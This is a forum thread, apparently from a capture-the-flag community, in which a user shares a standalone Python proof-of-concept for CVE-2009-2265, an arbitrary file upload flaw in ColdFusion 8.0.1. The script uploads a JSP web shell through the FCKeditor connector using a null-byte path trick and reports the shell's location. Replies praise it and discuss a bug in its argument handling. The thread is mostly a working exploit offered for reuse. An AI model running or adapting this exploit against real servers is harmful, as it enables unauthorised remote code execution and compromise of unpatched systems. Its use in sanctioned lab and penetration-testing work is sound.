[Python] ColdFusion 8.0.1 - Arbitrary File Upload

I wasn’t able to find a standalone PoC for the arbitrary file vulnerability in ColdFusion on Arctic, so I made my own. Hopefully some of you will get some use out of it!

#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265 
# 
# Description: 
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body=payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body=payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00", files={'newfile': ('exploit.txt', body, 'application/x-java-archive')}, timeout=30)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'

Reference: https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/

1 Like

Nice stuff Arrexel. In your usage instructions you have “[/path/to/coldfusion]” but then, from what I can tell, you do specify that in your example?

@delo said:
Nice stuff Arrexel. In your usage instructions you have “[/path/to/coldfusion]” but then, from what I can tell, you do specify that in your example?

The path to ColdFusion is optional, in the example it links to the jsp payload file. That path is used if the CFIDE directory is not in its default location.

Hey @Arrexel, any chance we can get the URL in the official writeup to link back to your website? Getting a 404 error - https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/ . I would like to reference it in my writeup :slight_smile:

Excellent script! Thanks!

1 Like

Thank you for your script @Arrexel !It worked! That website link seems to be broken (gives 404 error) though.

One thing I also observed is that the script only works if the webroot of the site is the default, if you try to pass the path to ColdFusion as the third argument the script will through an error file not found, because the script treats it as the payload file, so it wont work with path